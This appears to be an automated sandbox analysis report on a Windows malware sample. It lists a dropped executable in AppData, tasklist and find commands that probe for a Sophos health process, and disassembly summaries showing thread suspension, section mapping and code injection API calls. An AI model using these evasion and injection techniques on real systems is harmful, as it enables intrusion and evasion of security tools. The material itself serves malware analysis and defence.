                                                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:35
                                                                                                                                                                                                                                Start time:13:11:23
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
                                                                                                                                                                                                                                Imagebase:0x7ff649240000
                                                                                                                                                                                                                                File size:106'496 bytes
                                                                                                                                                                                                                                MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:36
                                                                                                                                                                                                                                Start time:13:11:23
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Windows\System32\find.exe
                                                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                                                Commandline:find /I "sophoshealth.exe"
                                                                                                                                                                                                                                Imagebase:0x7ff6566e0000
                                                                                                                                                                                                                                File size:17'920 bytes
                                                                                                                                                                                                                                MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                General

                                                                                                                                                                                                                                Target ID:37
                                                                                                                                                                                                                                Start time:13:11:27
                                                                                                                                                                                                                                Start date:30/12/2024
                                                                                                                                                                                                                                Path:C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe
                                                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe"
                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                File size:846'325'235 bytes
                                                                                                                                                                                                                                MD5 hash:6A8860A8150021B2D5B9BB707DE4FA37
                                                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                                                Disassembly

                                                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                                                  Execution Coverage:1.2%
                                                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                  Signature Coverage:41%
                                                                                                                                                                                                                                  Total number of Nodes:117
                                                                                                                                                                                                                                  Total number of Limit Nodes:11
                                                                                                                                                                                                                                  execution_graph 15042 7b03b0 15043 7b03be 15042->15043 15058 7b0d00 15043->15058 15045 7b0949 15046 7b0556 GetPEB 15048 7b05d3 15046->15048 15047 7b0511 15047->15045 15047->15046 15061 7b0ac0 15048->15061 15051 7b0634 CreateThread 15052 7b060c 15051->15052 15073 7b0970 GetPEB 15051->15073 15057 7b0844 15052->15057 15069 7b0fc0 GetPEB 15052->15069 15054 7b0934 TerminateProcess 15054->15045 15055 7b0ac0 4 API calls 15055->15057 15057->15054 15059 7b0d0d 15058->15059 15071 7b0d20 GetPEB 15058->15071 15059->15047 15062 7b0ad6 CreateToolhelp32Snapshot 15061->15062 15064 7b0606 15062->15064 15065 7b0b0d Thread32First 15062->15065 15064->15051 15064->15052 15065->15064 15066 7b0b34 15065->15066 15066->15064 15067 7b0b6b Wow64SuspendThread 15066->15067 15068 7b0b95 CloseHandle 15066->15068 15067->15068 15068->15066 15070 7b068e 15069->15070 15070->15055 15070->15057 15072 7b0d3b 15071->15072 15072->15059 15075 7b09c9 15073->15075 15074 7b0a76 15075->15074 15076 7b0a29 CreateThread 15075->15076 15076->15075 15077 7b11a0 15076->15077 15080 7fed65 15077->15080 15081 7fed8a 15080->15081 15082 7fee74 15080->15082 15116 8015e7 15081->15116 15092 800040 15082->15092 15085 7feda2 15086 8015e7 LoadLibraryA 15085->15086 15091 7b11a5 15085->15091 15087 7fede4 15086->15087 15088 8015e7 LoadLibraryA 15087->15088 15089 7fee00 15088->15089 15090 8015e7 LoadLibraryA 15089->15090 15090->15091 15093 8015e7 LoadLibraryA 15092->15093 15094 800063 15093->15094 15095 8015e7 LoadLibraryA 15094->15095 15096 80007b 15095->15096 15097 8015e7 LoadLibraryA 15096->15097 15098 800099 15097->15098 15099 8000ae VirtualAlloc 15098->15099 15109 8000c2 15098->15109 15101 8000dc 15099->15101 15099->15109 15100 8015e7 LoadLibraryA 15102 80015a 15100->15102 15101->15100 15104 800335 15101->15104 15106 8001b0 15102->15106 15102->15109 15120 8013ee 15102->15120 15103 8015e7 LoadLibraryA 15103->15106 15107 8003f3 VirtualFree 15104->15107 15114 800392 15104->15114 15106->15103 15106->15104 15108 800212 15106->15108 15107->15109 15108->15104 15115 800274 15108->15115 15148 7ff1d0 15108->15148 15109->15091 15112 80025d 15112->15104 15155 7ff2cb 15112->15155 15114->15114 15115->15104 15124 800770 15115->15124 15117 8015fe 15116->15117 15118 801625 15117->15118 15174 7ff6ec 15117->15174 15118->15085 15122 801403 15120->15122 15121 801479 LoadLibraryA 15123 801483 15121->15123 15122->15121 15122->15123 15123->15102 15125 8007ab 15124->15125 15126 8007f2 NtCreateSection 15125->15126 15127 800817 15125->15127 15147 800e1f 15125->15147 15126->15127 15126->15147 15128 8008ac NtMapViewOfSection 15127->15128 15127->15147 15137 8008cc 15128->15137 15129 800bf5 VirtualAlloc 15140 800c37 15129->15140 15130 8013ee LoadLibraryA 15130->15137 15131 8013ee LoadLibraryA 15135 800b53 15131->15135 15132 800ce8 VirtualProtect 15133 800db3 VirtualProtect 15132->15133 15142 800d08 15132->15142 15139 800de2 15133->15139 15134 800bf1 15134->15129 15135->15129 15135->15131 15135->15134 15160 80148c 15135->15160 15136 80148c LoadLibraryA 15136->15137 15137->15130 15137->15135 15137->15136 15137->15147 15138 800f2d 15143 800f35 CreateThread 15138->15143 15138->15147 15139->15138 15139->15147 15164 8011a1 15139->15164 15140->15132 15144 800cd5 NtMapViewOfSection 15140->15144 15140->15147 15142->15133 15146 800d8d VirtualProtect 15142->15146 15143->15147 15144->15132 15144->15147 15146->15142 15147->15104 15149 8013ee LoadLibraryA 15148->15149 15150 7ff1e4 15149->15150 15151 80148c LoadLibraryA 15150->15151 15154 7ff1ec 15150->15154 15152 7ff204 15151->15152 15153 80148c LoadLibraryA 15152->15153 15152->15154 15153->15154 15154->15112 15156 8013ee LoadLibraryA 15155->15156 15157 7ff2e1 15156->15157 15158 80148c LoadLibraryA 15157->15158 15159 7ff2f1 15158->15159 15159->15115 15161 8014a7 15160->15161 15163 8015bd 15160->15163 15161->15163 15168 7ff891 15161->15168 15163->15135 15167 8011c9 15164->15167 15165 8013bb 15165->15138 15166 80148c LoadLibraryA 15166->15167 15167->15165 15167->15166 15170 7ff8b0 15168->15170 15171 7ff8d6 15168->15171 15169 8013ee LoadLibraryA 15173 7ff8e3 15169->15173 15170->15171 15172 80148c LoadLibraryA 15170->15172 15170->15173 15171->15169 15171->15173 15172->15170 15173->15163 15175 7ff7f1 15174->15175 15176 7ff70c 15174->15176 15175->15117 15176->15175 15177 7ff891 LoadLibraryA 15176->15177 15177->15175

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 00800770 Relevance: 12.7, APIs: 8, Instructions: 730memorynativethreadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 00800809
                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,00000000), ref: 008008B1
                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00800C25
                                                                                                                                                                                                                                  • NtMapViewOfSection.NTDLL(?,00000000,?,?,?,?,?,?), ref: 00800CDA
                                                                                                                                                                                                                                  • VirtualProtect.KERNEL32(?,?,00000008,?,?,?,?,?,?,?), ref: 00800CF7
                                                                                                                                                                                                                                  • VirtualProtect.KERNEL32(?,?,?,00000000), ref: 00800D9A
                                                                                                                                                                                                                                  • VirtualProtect.KERNEL32(?,?,00000002,?,?,?,?,?,?,?), ref: 00800DCD
                                                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?), ref: 00800F3E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Virtual$ProtectSection$CreateView$AllocThread
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1248616170-0
                                                                                                                                                                                                                                  • Opcode ID: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                                                                                                                                  • Instruction ID: eddcc8a4f047834b66211c31902d4c3d1e7c5b2c064a268c71aa6b4bdaeac171
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ff471fed8362e1f6680916959444b0539dd2ef4160a15e649cb06b76fd5f0269
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F424771608311AFDBA4CF18CC44B6ABBE9FF88714F144929F989DB291D770E944CB92
                                                                                                                                                                                                                                  Function 007B0AC0 Relevance: 6.1, APIs: 4, Instructions: 100threadprocessCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 187 7b0ac0-7b0b07 CreateToolhelp32Snapshot 190 7b0bdd-7b0be0 187->190 191 7b0b0d-7b0b2e Thread32First 187->191 192 7b0bc9-7b0bd8 191->192 193 7b0b34-7b0b3a 191->193 192->190 194 7b0ba9-7b0bc3 193->194 195 7b0b3c-7b0b42 193->195 194->192 194->193 195->194 196 7b0b44-7b0b63 195->196 196->194 199 7b0b65-7b0b69 196->199 200 7b0b6b-7b0b7f Wow64SuspendThread 199->200 201 7b0b81-7b0b90 199->201 202 7b0b95-7b0ba7 CloseHandle 200->202 201->202 202->194
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000,?,?,?,?,?,007B0606,?,00000001,?,81EC8B55,000000FF), ref: 007B0AFE
                                                                                                                                                                                                                                  • Thread32First.KERNEL32(00000000,0000001C), ref: 007B0B2A
                                                                                                                                                                                                                                  • Wow64SuspendThread.KERNEL32(00000000), ref: 007B0B7D
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 007B0BA7
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CloseCreateFirstHandleSnapshotSuspendThreadThread32Toolhelp32Wow64
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1849706056-0
                                                                                                                                                                                                                                  • Opcode ID: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                                                                                                                                  • Instruction ID: efbc479f83878c0f6edc737464d7e6300d66d05a97b4408a635c6061804db000
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ed4f7e93d5c748d87e273fbd072de27cfcb41b6612c19f34ce8dd7f2a24eca5e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5C4100B1600108EFDB18DF98C894FEEB7B6EF88304F108169E6159B794DA74AE45CB94
                                                                                                                                                                                                                                  Function 007B03B0 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 399threadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 203 7b03b0-7b0518 call 7b0960 call 7b0f60 call 7b1110 call 7b0d00 212 7b0949-7b094c 203->212 213 7b051e-7b0525 203->213 214 7b0530-7b0534 213->214 215 7b0556-7b05d1 GetPEB 214->215 216 7b0536-7b0554 call 7b0e80 214->216 218 7b05dc-7b05e0 215->218 216->214 220 7b05f8-7b060a call 7b0ac0 218->220 221 7b05e2-7b05f6 218->221 226 7b060c-7b0632 220->226 227 7b0634-7b0655 CreateThread 220->227 221->218 228 7b0658-7b065c 226->228 227->228 230 7b091d-7b0947 TerminateProcess 228->230 231 7b0662-7b0695 call 7b0fc0 228->231 230->212 231->230 235 7b069b-7b06ea 231->235 237 7b06f5-7b06fb 235->237 238 7b06fd-7b0703 237->238 239 7b0743-7b0747 237->239 242 7b0716-7b071a 238->242 243 7b0705-7b0714 238->243 240 7b074d-7b075a 239->240 241 7b0815-7b0908 call 7b0ac0 call 7b0960 call 7b0f60 239->241 244 7b0765-7b076b 240->244 269 7b090a 241->269 270 7b090d-7b0917 241->270 245 7b071c-7b072a 242->245 246 7b0741 242->246 243->242 249 7b079b-7b079e 244->249 250 7b076d-7b077b 244->250 245->246 251 7b072c-7b073e 245->251 246->237 255 7b07a1-7b07a8 249->255 253 7b0799 250->253 254 7b077d-7b078c 250->254 251->246 253->244 254->253 257 7b078e-7b0797 254->257 255->241 259 7b07aa-7b07b3 255->259 257->249 259->241 261 7b07b5-7b07c5 259->261 263 7b07d0-7b07dc 261->263 265 7b07de-7b080b 263->265 266 7b080d-7b0813 263->266 265->263 266->255 269->270 270->230
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 007B0653
                                                                                                                                                                                                                                  • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 007B0947
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateProcessTerminateThread
                                                                                                                                                                                                                                  • String ID: ;18>
                                                                                                                                                                                                                                  • API String ID: 1197810419-4114189899
                                                                                                                                                                                                                                  • Opcode ID: 01db8638dc9beb1a86da21c4f28cc92fffd9a77d584b18a722812e880b597604
                                                                                                                                                                                                                                  • Instruction ID: 52b06c30d3c787e03b54ac383f886ff94489c91e7cc4a4bd6100bba1a992bbc2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 01db8638dc9beb1a86da21c4f28cc92fffd9a77d584b18a722812e880b597604
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6812B0B4A00219DBDB14CF98C995BEEBBB1FF88304F2481A9D515AB385D734AA41CF94
                                                                                                                                                                                                                                  Function 007B0970 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 103threadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 271 7b0970-7b09c7 GetPEB 272 7b09d2-7b09d6 271->272 273 7b09dc-7b09e7 272->273 274 7b0a76-7b0a7d 272->274 276 7b09ed-7b0a04 273->276 277 7b0a71 273->277 275 7b0a88-7b0a8c 274->275 279 7b0a8e-7b0a9b 275->279 280 7b0a9d-7b0aa4 275->280 281 7b0a29-7b0a41 CreateThread 276->281 282 7b0a06-7b0a27 276->282 277->272 279->275 285 7b0aad-7b0ab2 280->285 286 7b0aa6-7b0aa8 280->286 283 7b0a45-7b0a4d 281->283 282->283 283->277 288 7b0a4f-7b0a6c 283->288 286->285 288->277
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000), ref: 007B0A3C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CreateThread
                                                                                                                                                                                                                                  • String ID: ,
                                                                                                                                                                                                                                  • API String ID: 2422867632-3772416878
                                                                                                                                                                                                                                  • Opcode ID: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                                                                                                                                  • Instruction ID: 629b5df11a6da26677adfada5f175a2e754569f23085508637fcb6c3902dc2ef
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc60953fbf7661c618888493d7684cefa6d88d8934743e077e5b29c3addb46ae
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8541D274A00209EFDB04CF98C994BAEBBB1FF88314F208598D515AB391D775AE81DF94
                                                                                                                                                                                                                                  Function 008013EE Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66libraryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 290 8013ee-801401 291 801403-801406 290->291 292 801419-801423 290->292 295 801408-80140b 291->295 293 801432-80143e 292->293 294 801425-80142d 292->294 296 801441-801446 293->296 294->293 295->292 297 80140d-801417 295->297 298 801448-801453 296->298 299 801479-801480 LoadLibraryA 296->299 297->292 297->295 300 801455-80146d call 801abc 298->300 301 80146f-801473 298->301 302 801483-801487 299->302 300->301 306 801488-80148a 300->306 301->296 304 801475-801477 301->304 304->299 304->302 306->302
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(00000000,?,?), ref: 00801480
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: LibraryLoad
                                                                                                                                                                                                                                  • String ID: .dll
                                                                                                                                                                                                                                  • API String ID: 1029625771-2738580789
                                                                                                                                                                                                                                  • Opcode ID: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                                                                                                                                  • Instruction ID: 4a81cfde1857396f623c2daa33664ea657cde2ff049770ced8f77e2731dfb885
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f6f06f52cd4a024ca790678b75224790e8b38e6a55f670a1ffdfea5ea75d1fe1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3521E4366006958FDF61CFA9DC88A6DBBA9FF01734F18416DD841CBAA1D730EC458794
                                                                                                                                                                                                                                  Function 00800040 Relevance: 2.8, APIs: 2, Instructions: 325memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 307 800040-8000a4 call 8015e7 * 3 314 8000a6-8000a8 307->314 315 8000ce 307->315 314->315 316 8000aa-8000ac 314->316 317 8000d1-8000db 315->317 316->315 318 8000ae-8000c0 VirtualAlloc 316->318 319 8000c2-8000c9 318->319 320 8000dc-8000ff call 801a5c call 801a80 318->320 319->315 321 8000cb 319->321 326 800101-800137 call 801754 call 80162a 320->326 327 800149-800162 call 8015e7 320->327 321->315 336 800398-8003a1 326->336 337 80013d-800143 326->337 327->315 333 800168 327->333 335 80016e-800174 333->335 338 8001b0-8001b9 335->338 339 800176-80017c 335->339 342 8003a3-8003a6 336->342 343 8003a8-8003b0 336->343 337->327 337->336 340 800212-80021d 338->340 341 8001bb-8001c1 338->341 344 80017e-800181 339->344 350 800236-800239 340->350 351 80021f-800228 call 7ff334 340->351 347 8001c5-8001e0 call 8015e7 341->347 342->343 348 8003df 342->348 343->348 349 8003b2-8003dd call 801a80 343->349 345 800183-800188 344->345 346 800195-800197 344->346 345->346 354 80018a-800193 345->354 346->338 355 800199-8001a7 call 8013ee 346->355 372 8001e2-8001ea 347->372 373 8001ff-800210 347->373 352 8003e3-800403 call 801a80 VirtualFree 348->352 349->352 356 800394 350->356 357 80023f-800248 350->357 351->356 368 80022e-800234 351->368 376 800405 352->376 377 800409-80040b 352->377 354->344 354->346 369 8001ac-8001ae 355->369 356->336 363 80024a 357->363 364 80024e-800255 357->364 363->364 370 800285-800289 364->370 371 800257-800260 call 7ff1d0 364->371 368->364 369->335 374 80032b-80032e 370->374 375 80028f-8002b1 370->375 387 800262-800268 371->387 388 80026e-800277 call 7ff2cb 371->388 372->356 379 8001f0-8001f9 372->379 373->340 373->347 381 800380-800382 call 800770 374->381 382 800330-800333 374->382 375->356 392 8002b7-8002ca call 801a5c 375->392 376->377 377->317 379->356 379->373 391 800387-800388 381->391 382->381 384 800335-800338 382->384 389 800351-800362 call 7ffe31 384->389 390 80033a-80033c 384->390 387->356 387->388 388->370 404 800279-80027f 388->404 408 800373-80037e call 7ff8fd 389->408 409 800364-800370 call 800410 389->409 390->389 394 80033e-800341 390->394 395 800389-800390 391->395 406 8002cc-8002d0 392->406 407 8002ee-800327 392->407 399 800343-800346 394->399 400 800348-80034f call 800fde 394->400 395->356 401 800392 395->401 399->395 399->400 400->391 401->401 404->356 404->370 406->407 411 8002d2-8002d5 406->411 407->356 419 800329 407->419 408->391 409->408 411->374 415 8002d7-8002ec call 80185f 411->415 415->419 419->374
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 008000BA
                                                                                                                                                                                                                                  • VirtualFree.KERNELBASE(00000000,00000000,0000C000), ref: 008003FE
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2087232378-0
                                                                                                                                                                                                                                  • Opcode ID: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                                                                                                                                                  • Instruction ID: 1647b261e3d4e7488e1a26dd8fb8b5fb1b7e9d915db6626a2517dad04040c58c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 913584bddb567b179a3f9b4e0e6654d789e61ea3d5744fe4b2293047c08ef92d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 70B1F331501B06EBDBA29FA4CC84BABB7E8FF09310F110529F549D6291E731E950DFA2

                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                  Function 007C3D8D Relevance: 154.5, Strings: 122, Instructions: 1958COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: $"$"$"$"$"$"$#$#$#$#$#$#$#$$$%$%$&$'$)$+$,$,$,$,$,$,$-$-$-$-$-$-$/$0$1$1$3$4$5$6$6$7$7$7$8$8$:$:$<$=$=$>$?$?$?$@$A$B$C$C$D$D$D$D$D$E$E$F$G$G$H$I$J$K$L$M$N$O$O$P$Q$Q$R$S$T$T$U$V$W$X$X$X$Y$Z$[$\$]$^$_$`$a$b$f$f$h$l$n$t$t$t$u$v$x$x$y${${$|$}$}$~
                                                                                                                                                                                                                                  • API String ID: 0-2552012311
                                                                                                                                                                                                                                  • Opcode ID: a60d0d7c1f50fa8930e41d0816f0c6d686d7dd5bc90f90f0dee7d4406a5567cf
                                                                                                                                                                                                                                  • Instruction ID: ac3af63ef3957aa94ffb2891c93527f24145fe803c9e0f9f610b7818da6c82da
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a60d0d7c1f50fa8930e41d0816f0c6d686d7dd5bc90f90f0dee7d4406a5567cf
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7613AA7010C7C18ED3359B38C4987AFBBE1AB96324F188A6DE1E987392D7798545CB13
                                                                                                                                                                                                                                  Function 007E426D Relevance: 50.2, Strings: 40, Instructions: 199COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 879 7e426d-7e42b7 880 7e42b9-7e42bc 879->880 881 7e42be-7e4322 880->881 882 7e4324-7e4514 880->882 881->880 884 7e4516-7e4519 882->884 885 7e451f-7e45c6 884->885 886 7e45cb-7e45ff 884->886 885->884
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: $"$#$$$&$'$($*$,$.$0$2$4$6$8$8$:$<$>$?$A$B$H$J$L$M$P$P$Q$R$S$X$Z$\$^$_$`$r$w$y
                                                                                                                                                                                                                                  • API String ID: 0-810699627
                                                                                                                                                                                                                                  • Opcode ID: 0dca25496aefb40c577bd73c3ef91dbf49218b3d3d3069416841fbfb493506a1
                                                                                                                                                                                                                                  • Instruction ID: ba2c5450a4a12905d258c364152663ee51a8912ba663561f0d729d459970301c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0dca25496aefb40c577bd73c3ef91dbf49218b3d3d3069416841fbfb493506a1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9CA15C2160C7D18ED336863C885939FBEC11BE7228F094A9DD5E94B2D3CAB94509C767
                                                                                                                                                                                                                                  Function 007E2E0D Relevance: 50.2, Strings: 40, Instructions: 199COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 870 7e2e0d-7e2e43 871 7e2e45-7e2e48 870->871 872 7e2e4a-7e2eae 871->872 873 7e2eb0-7e30a4 871->873 872->871 875 7e30ab-7e30ae 873->875 876 7e3167-7e31af 875->876 877 7e30b4-7e3162 875->877 877->875
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2077777234.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: false
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7b0000_setup.jbxd
                                                                                                                                                                                                                                  Yara matches
